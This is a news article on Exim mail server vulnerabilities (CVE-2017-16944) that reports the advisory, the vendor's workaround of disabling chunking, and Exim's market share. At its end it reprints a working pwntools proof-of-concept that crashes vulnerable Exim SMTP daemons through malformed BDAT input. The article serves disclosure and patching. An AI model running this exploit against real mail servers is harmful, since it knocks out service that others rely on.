Oh no, you're thinking, yet another cookie pop-up. Well, sorry, it's the law. We measure how many people read us, and ensure you see relevant ads, by storing cookies on your device. If you're cool with that, hit “Accept all Cookies”. For more info and to customize your settings, hit “Customize Settings”.

Review and manage your consent

Here's an overview of our use of cookies, similar technologies and how to manage them. You can also change your choices at any time, by hitting the “Your Consent Options” link on the site's footer.

Manage Cookie Preferences
  • These cookies are strictly necessary so that you can navigate the site as normal and use all features. Without these cookies we cannot provide you with the service that you expect.

  • These cookies are used to make advertising messages more relevant to you. They perform functions like preventing the same ad from continuously reappearing, ensuring that ads are properly displayed for advertisers, and in some cases selecting advertisements that are based on your interests.

  • These cookies collect information in aggregate form to help us understand how our websites are being used. They allow us to count visits and traffic sources so that we can measure and improve the performance of our sites. If people say no to these cookies, we do not know how many people have visited and we cannot monitor performance.

See also our Cookie policy and Privacy policy.

This article is more than 1 year old

Exim-ergency! Unix mailer has RCE, DoS vulnerabilities

Patch imminent, for now please turn off email attachment chunking

Sysadmins who tend Exim servers have been advised to kick off their working weeks with the joy of patching.

The popular (if relatively low-profile) Internet mail message transfer agent (MTA) advised of flaws in a Black Friday post to its public bugtracker, which as contributor Phil Pennock said in this message came without any prior notice.

The bug tracker post explained that when parsing the BDAT data header, Exim scans for the '.' character to signify the end of an email. BDAT is a server verb associated with the MTA's ability to handle large attachments in chunks (see RFC 1830, for example).

The advisory included a proof-of-concept (less than 30 lines, below). The poster explained that because a function pointer, receive_getc is not reset, the PoC makes Exim run out of stack and crash.

The announcement for CVE-2017-16944 identified the slip as existing in the “receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89”.

Confirming the bug, Pennock said the developers have a “tentative patch” but it needs to be confirmed.

The workaround in the meantime, he said, is to disable chunking by setting the following flag:

chunking_advertise_hosts=

The empty value after the equal sign turns off the vulnerable function.

According to a November 2017 study by E-Soft, Exim is by far the most popular MTA on the Internet, in use on nearly 57 per cent of MX servers it identified. ®

The proof-of-concept

# pip install pwntools
from pwn import *

r = remote('localhost', 25)

r.recvline()
r.sendline("EHLO test")
r.recvuntil("250 HELP")
r.sendline("MAIL FROM:<test@localhost>")
r.recvline()
r.sendline("RCPT TO:<test@localhost>")
r.recvline()
#raw_input()
r.sendline('a'*0x1100+'\x7f')
#raw_input()
r.recvuntil('command')
r.sendline('BDAT 1')
r.sendline(':BDAT \x7f')
s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)
r.send(s+ ':\r\n')
r.recvuntil('command')
#raw_input()
r.send('\n')
r.interactive()
exit()
 

Similar topics

Similar topics

Similar topics

TIP US OFF

Send us news


Other stories you might like